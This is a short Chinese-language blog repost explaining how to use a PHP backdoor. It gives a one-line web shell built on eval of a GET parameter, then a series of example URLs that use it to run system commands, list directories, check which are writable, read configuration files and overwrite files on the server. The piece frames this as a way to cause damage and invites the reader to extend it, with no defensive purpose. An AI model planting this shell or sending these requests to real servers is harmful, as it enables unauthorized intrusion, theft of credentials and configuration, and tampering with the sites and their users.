您现在的位置是:首页 > 文章详情

PHP后门的一些用法

日期:2018-09-03点击:365

今天我们说一些最常见的PHP留后门的一些用法
首先,写一个最简单的后门,也可以叫做木马。

<?php eval($_GET['evl']); 

就酱,你已经获得了这台服务器上的很多执行权限。那场景的用法有哪些呢?

打印服务器phpinfo

http://www.test.com/a.php?evl=phpinfo() 

查看某个目录下有什么文件

http://www.test.com/a.php?evl=var_dump(system("ls /mnt/web/ -a")); 

查看目录是否可写,接下里就可以在可写的目录里创建可执行文件了

http://www.test.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/")); 

获取某个文件的内容,一般用来读取配置

http://www.test.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php")); 

对某个可写目录进行写文件

http://www.test.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php"))); 

好了,以上基本已经可以完成对一个服务器的查看的部分破坏了,其他的功能就试着举一反三吧。

原文链接:https://yq.aliyun.com/articles/634827
关注公众号

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。

持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。

转载内容版权归作者及来源网站所有,本站原创内容转载请注明来源。

文章评论

共有0条评论来说两句吧...

文章二维码

扫描即可查看该文章

点击排行

推荐阅读

最新文章